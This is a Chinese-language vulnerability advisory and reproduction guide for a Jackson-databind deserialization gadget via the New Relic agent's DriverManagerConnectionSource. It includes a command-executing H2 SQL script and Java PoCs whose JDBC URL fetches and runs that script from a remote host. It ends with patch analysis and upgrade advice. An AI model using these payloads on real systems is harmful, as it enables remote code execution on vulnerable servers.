影响范围
Jackson-databind < 2.9.10.7
漏洞类型
JDNI注入导致RCE
利用条件
- 开启enableDefaultTyping()
- 使用了com.h2databasecom.newrelic.agent.java第三方依赖库
漏洞概述
com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource类绕过了之前jackson-databind维护的黑名单类,并且JDK版本较低的话,可造成SSRF&RCE。
漏洞复现
环境搭建
pom.xml文件如下:
代码语言:html复制 <dependencies>
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>2.9.10.7</version>
</dependency>
<!-- https://mvnrepository.com/artifact/com.newrelic.agent.java/newrelic-agent -->
<dependency>
<groupId>com.newrelic.agent.java</groupId>
<artifactId>newrelic-agent</artifactId>
<version>4.9.0</version>
</dependency>
<!-- https://mvnrepository.com/artifact/com.h2database/h2 -->
<dependency>
<groupId>com.h2database</groupId>
<artifactId>h2</artifactId>
<version>1.4.199</version>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-nop</artifactId>
<version>1.7.2</version>
</dependency>
<!-- https://mvnrepository.com/artifact/javax.transaction/jta -->
<dependency>
<groupId>javax.transaction</groupId>
<artifactId>jta</artifactId>
<version>1.1</version>
</dependency>
</dependencies>漏洞利用
构造exec.sql
代码语言:javascript复制CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('calc.exe')简易web服务
代码语言:javascript复制python2 -m simpleHTTPServer 4444
执行漏洞POC1
poc.java代码如下所示:
代码语言:javascript复制import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;
public class POC {
public static void main(String[] args) throws Exception {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);
String json = "["com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://6vrdsp.dnslog.cn/exec.sql'"}]";
Object obj = mapper.readValue(json, Object.class);
mapper.writeValueAsString(obj);
}
}
dnslog平台结果:
执行漏洞POC2
Poc.java代码如下所示:
代码语言:javascript复制import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;
public class POC {
public static void main(String[] args) throws Exception {
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);
String json = "["com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:4444/exec.sql'"}]";
Object obj = mapper.readValue(json, Object.class);
mapper.writeValueAsString(obj);
}
}之后运行该程序,成功执行命令,弹出计算器:
漏洞分析
com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource类中提供了对url的set方法,可以通过反序列化进行赋值操作,同时在getConnection中通过DriverManager.getConnection()进行远程连接,参数url可控,从而可导致SSRF,当classpath中存在h2数据库时甚至可以导致RCE:
Gadget如下:
代码语言:javascript复制DriverManagerConnectionSource
->seturl
->getConnection
->DirverManager.getConnection(this.url)补丁分析
官方将com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource加入黑名单中,但是这种修复方案只能一时间缓解,因为难免会出现其他黑名单绕过方案:
修复建议
- 及时将jackson-databind升级到安全版本(>2.9.10.7)
- 升级到较高版本的JDK
